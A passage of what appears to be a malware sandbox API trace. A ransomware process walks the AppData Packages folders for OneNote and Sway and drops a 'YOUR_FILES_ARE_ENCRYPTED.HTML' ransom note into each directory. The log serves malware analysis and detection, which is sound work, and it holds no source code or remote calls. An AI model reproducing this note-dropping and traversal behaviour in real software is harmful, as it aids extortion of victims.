lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x64acb91c, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x64acb91c, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x64acb91c, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d3e8, dwReserved1=0x315d338, cFileName=".", cAlternateFileName="")) returned 0x626638 [0116.883] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x64acb91c, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x64acb91c, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x64acb91c, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d3e8, dwReserved1=0x315d338, cFileName="..", cAlternateFileName="")) returned 1 [0116.883] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x64acb91c, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x64acb91c, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x64acb91c, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d3e8, dwReserved1=0x315d338, cFileName="..", cAlternateFileName="")) returned 0 [0116.883] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0116.883] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\SystemAppData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 131 [0116.883] GetProcessHeap () returned 0x600000 [0116.883] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.884] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\SystemAppData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.office.onenote_8wekyb3d8bbwe\\systemappdata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0116.884] WriteFile (in: hFile=0x320, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0116.885] CloseHandle (hObject=0x320) returned 1 [0116.885] GetProcessHeap () returned 0x600000 [0116.885] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.885] GetProcessHeap () returned 0x600000 [0116.885] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0116.885] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x64aa577d, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x64aa577d, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x64aa577d, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 1 [0116.885] StrStrIW (lpFirst="TempState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.885] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\TempState") returned 97 [0116.885] GetProcessHeap () returned 0x600000 [0116.885] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0116.885] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\TempState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\TempState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\TempState" [0116.885] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\TempState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\TempState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\TempState\\*" [0116.885] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\TempState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x64aa577d, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x64aa577d, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x64aa577d, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d3e8, dwReserved1=0x315d338, cFileName=".", cAlternateFileName="")) returned 0x626838 [0116.886] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x64aa577d, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x64aa577d, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x64aa577d, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d3e8, dwReserved1=0x315d338, cFileName="..", cAlternateFileName="")) returned 1 [0116.886] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x64aa577d, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x64aa577d, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x64aa577d, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d3e8, dwReserved1=0x315d338, cFileName="..", cAlternateFileName="")) returned 0 [0116.886] FindClose (in: hFindFile=0x626838 | out: hFindFile=0x626838) returned 1 [0116.886] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\TempState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 127 [0116.886] GetProcessHeap () returned 0x600000 [0116.886] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.886] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\TempState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.office.onenote_8wekyb3d8bbwe\\tempstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0116.886] WriteFile (in: hFile=0x320, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0116.898] CloseHandle (hObject=0x320) returned 1 [0116.898] GetProcessHeap () returned 0x600000 [0116.898] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.898] GetProcessHeap () returned 0x600000 [0116.898] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0116.899] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x64aa577d, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x64aa577d, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x64aa577d, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 0 [0116.899] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0116.899] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 117 [0116.899] GetProcessHeap () returned 0x600000 [0116.899] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.899] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.OneNote_8wekyb3d8bbwe\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.office.onenote_8wekyb3d8bbwe\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0116.900] WriteFile (in: hFile=0x31c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0116.900] CloseHandle (hObject=0x31c) returned 1 [0116.900] GetProcessHeap () returned 0x600000 [0116.901] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.901] GetProcessHeap () returned 0x600000 [0116.901] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0116.901] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x61716890, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x61a5dc2a, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x61e63d2f, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName="Microsoft.Office.Sway_8wekyb3d8bbwe", cAlternateFileName="MICROS~1.SWA")) returned 1 [0116.902] StrStrIW (lpFirst="Microsoft.Office.Sway_8wekyb3d8bbwe", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.902] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe") returned 84 [0116.902] GetProcessHeap () returned 0x600000 [0116.902] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0116.902] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe" [0116.902] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\*" [0116.903] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x61716890, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x61a5dc2a, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x61e63d2f, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName=".", cAlternateFileName="")) returned 0x6267b8 [0116.904] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x61716890, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x61a5dc2a, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x61e63d2f, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="..", cAlternateFileName="")) returned 1 [0116.904] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x61a5dc2a, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x61a5dc2a, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x61a84013, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="AC", cAlternateFileName="")) returned 1 [0116.904] StrStrIW (lpFirst="AC", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.904] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\AC") returned 87 [0116.904] GetProcessHeap () returned 0x600000 [0116.904] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0116.904] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\AC" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\AC") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\AC" [0116.904] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\AC", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\AC\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\AC\\*" [0116.904] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\AC\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x61a5dc2a, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x61a5dc2a, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x61a84013, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ece2, dwReserved1=0x62ec38, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0116.906] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x61a5dc2a, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x61a5dc2a, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x61a84013, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ece2, dwReserved1=0x62ec38, cFileName="..", cAlternateFileName="")) returned 1 [0116.906] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x61a84013, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x61a84013, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x61a84013, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ece2, dwReserved1=0x62ec38, cFileName="INetCache", cAlternateFileName="INETCA~1")) returned 1 [0116.906] StrStrIW (lpFirst="INetCache", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.906] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\AC\\INetCache") returned 97 [0116.906] GetProcessHeap () returned 0x600000 [0116.906] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0116.907] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\AC\\INetCache" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\AC\\INetCache") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\AC\\INetCache" [0116.907] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\AC\\INetCache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\AC\\INetCache\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\AC\\INetCache\\*" [0116.907] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\AC\\INetCache\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x61a84013, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x61a84013, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x61a84013, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d278, dwReserved1=0x62ec40, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0116.908] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x61a84013, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x61a84013, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x61a84013, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d278, dwReserved1=0x62ec40, cFileName="..", cAlternateFileName="")) returned 1 [0116.908] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x61a84013, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x61a84013, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x61a84013, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d278, dwReserved1=0x62ec40, cFileName="..", cAlternateFileName="")) returned 0 [0116.908] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0116.908] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\AC\\INetCache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 127 [0116.908] GetProcessHeap () returned 0x600000 [0116.908] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.909] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\AC\\INetCache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.office.sway_8wekyb3d8bbwe\\ac\\inetcache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0116.909] WriteFile (in: hFile=0x214, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0116.910] CloseHandle (hObject=0x214) returned 1 [0116.910] GetProcessHeap () returned 0x600000 [0116.910] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.910] GetProcessHeap () returned 0x600000 [0116.910] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0116.911] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x61a84013, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x61a84013, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x61a84013, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ece2, dwReserved1=0x62ec38, cFileName="INetCookies", cAlternateFileName="INETCO~1")) returned 1 [0116.911] StrStrIW (lpFirst="INetCookies", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.911] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\AC\\INetCookies") returned 99 [0116.911] GetProcessHeap () returned 0x600000 [0116.911] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0116.912] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\AC\\INetCookies" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\AC\\INetCookies") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\AC\\INetCookies" [0116.912] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\AC\\INetCookies", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\AC\\INetCookies\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\AC\\INetCookies\\*" [0116.912] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\AC\\INetCookies\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x61a84013, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x61a84013, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x61a84013, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d278, dwReserved1=0x62ec40, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0116.912] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x61a84013, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x61a84013, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x61a84013, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d278, dwReserved1=0x62ec40, cFileName="..", cAlternateFileName="")) returned 1 [0116.913] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x61a84013, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x61a84013, ftLastAccessTime.dwHighDateTime=0x1d70071, 